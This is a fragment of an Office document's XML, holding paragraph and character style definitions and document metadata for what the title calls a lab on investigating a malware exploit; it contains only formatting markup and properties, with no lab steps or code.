    <w:basedOn w:val="1914"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1887">
    <w:name w:val="Subtle Reference"/>
    <w:basedOn w:val="1914"/>
    <w:uiPriority w:val="31"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:smallCaps/>
      <w:color w:val="5a5a5a" w:themeColor="text1" w:themeTint="A5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1888">
    <w:name w:val="Book Title"/>
    <w:basedOn w:val="1914"/>
    <w:uiPriority w:val="33"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1889">
    <w:name w:val="Header"/>
    <w:basedOn w:val="1913"/>
    <w:link w:val="1890"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:tabs>
        <w:tab w:val="center" w:leader="none" w:pos="4844"/>
        <w:tab w:val="right" w:leader="none" w:pos="9689"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="1890">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="1914"/>
    <w:link w:val="1889"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1891">
    <w:name w:val="Footer"/>
    <w:basedOn w:val="1913"/>
    <w:link w:val="1892"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:tabs>
        <w:tab w:val="center" w:leader="none" w:pos="4844"/>
        <w:tab w:val="right" w:leader="none" w:pos="9689"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="1892">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="1914"/>
    <w:link w:val="1891"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1893">
    <w:name w:val="Caption"/>
    <w:basedOn w:val="1913"/>
    <w:next w:val="1913"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0e2841" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1894">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="1913"/>
    <w:link w:val="1895"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1895">
    <w:name w:val="Footnote Text Char"/>
    <w:basedOn w:val="1914"/>
    <w:link w:val="1894"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1896">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="1914"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1897">
    <w:name w:val="endnote text"/>
    <w:basedOn w:val="1913"/>
    <w:link w:val="1898"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1898">
    <w:name w:val="Endnote Text Char"/>
    <w:basedOn w:val="1914"/>
    <w:link w:val="1897"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1899">
    <w:name w:val="endnote reference"/>
    <w:basedOn w:val="1914"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1900">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="1914"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="0563c1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1901">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="1914"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="954f72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1902">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="1913"/>
    <w:next w:val="1913"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1903">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="1913"/>
    <w:next w:val="1913"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1904">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="1913"/>
    <w:next w:val="1913"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1905">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="1913"/>
    <w:next w:val="1913"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="660"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1906">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="1913"/>
    <w:next w:val="1913"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="880"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1907">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="1913"/>
    <w:next w:val="1913"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="1100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1908">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="1913"/>
    <w:next w:val="1913"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="1320"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1909">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="1913"/>
    <w:next w:val="1913"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="1540"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1910">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="1913"/>
    <w:next w:val="1913"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="1760"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1911">
    <w:name w:val="TOC Heading"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1912">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="1913"/>
    <w:next w:val="1913"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:afterAutospacing="0"/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1913" w:default="1">
    <w:name w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="1914" w:default="1">
    <w:name w:val="Default Paragraph Font"/>
    <w:uiPriority w:val="1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="19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16" w:default="1">
    <w:name w:val="No List"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="1917">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="1914"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1918" w:customStyle="1">
    <w:name w:val="590D3D55688E48DDB6EC995446F5394E"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1919" w:customStyle="1">
    <w:name w:val="49E5C2A683FF374D8B56395C3A481D78"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>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4C97F9-0AFB-4D2D-BC50-DB02FD367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C:\Users\spennock\Curriculum_Development\CAE_Documentation\CAE_Activities_Template\Lab_Template - ILM_2019_Accessibility.dotx</Template>
  <Application>ONLYOFFICE/9.0.4.50</Application>
  <HeadingPairs>
    <vt:vector size="0" baseType="variant"/>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="0" baseType="lpstr"/>
  </TitlesOfPart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 Investigating a Malware Exploit</dc:title>
  <dc:subject/>
  <dc:creator>SP</dc:creator>
  <dc:description>2020</dc:description>
  <dc:language>en-GB</dc:language>
  <cp:revision>19</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-07-15T19:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-18T14:41:49Z</dcterms:modified>
</cp:coreProperties>
</file>